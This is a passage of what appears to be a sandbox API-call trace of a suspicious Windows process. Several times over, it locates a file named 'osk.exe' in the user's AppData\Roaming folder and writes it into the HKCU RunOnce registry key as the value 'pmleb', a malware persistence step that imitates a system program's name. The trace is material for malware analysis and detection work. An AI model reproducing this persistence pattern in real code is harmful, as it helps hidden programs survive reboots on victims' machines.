lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.770] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.770] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.770] RegCloseKey (hKey=0x280) returned 0x0 [0080.770] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.770] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.770] SetTimer (hWnd=0x20280, nIDEvent=0x208c, uElapse=0xa, lpTimerFunc=0x0) returned 0x208c [0080.770] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.782] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.782] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.783] KillTimer (hWnd=0x20280, uIDEvent=0x208c) returned 1 [0080.783] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.783] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.783] IUnknown:Release (This=0x787518) returned 0x1 [0080.783] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.783] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.783] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.783] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.783] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.783] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.783] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.784] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.784] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.784] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x11 [0080.784] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.784] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x12 [0080.784] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.785] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x11 [0080.785] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.785] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.785] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.785] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.785] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.785] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.785] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.785] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.786] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.786] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.786] RegCloseKey (hKey=0x280) returned 0x0 [0080.786] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.786] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.786] SetTimer (hWnd=0x20280, nIDEvent=0x208d, uElapse=0xa, lpTimerFunc=0x0) returned 0x208d [0080.786] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.798] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.798] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.798] KillTimer (hWnd=0x20280, uIDEvent=0x208d) returned 1 [0080.798] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.798] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.799] IUnknown:Release (This=0x787518) returned 0x1 [0080.799] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.799] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.799] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.799] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.799] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.799] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.799] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.799] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.799] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.799] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x12 [0080.799] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.799] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x13 [0080.799] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.800] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x12 [0080.800] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.800] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.800] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.801] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.801] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.801] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.801] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.801] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.801] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.801] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.801] RegCloseKey (hKey=0x280) returned 0x0 [0080.801] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.802] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.802] SetTimer (hWnd=0x20280, nIDEvent=0x208e, uElapse=0xa, lpTimerFunc=0x0) returned 0x208e [0080.802] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.814] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.814] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.814] KillTimer (hWnd=0x20280, uIDEvent=0x208e) returned 1 [0080.814] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.814] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.814] IUnknown:Release (This=0x787518) returned 0x1 [0080.815] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.815] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.815] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.815] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.815] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.815] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.815] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.815] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.815] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.815] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x13 [0080.815] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.815] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x14 [0080.815] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.816] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x13 [0080.816] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.816] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.816] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.816] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.817] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.817] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.817] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.817] RegCreateKeyExA (in: hKey=0x80000001, 